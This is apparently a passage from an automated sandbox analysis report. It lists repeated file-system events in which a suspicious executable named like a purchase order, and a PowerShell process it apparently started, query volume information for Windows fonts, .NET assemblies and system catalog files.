                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
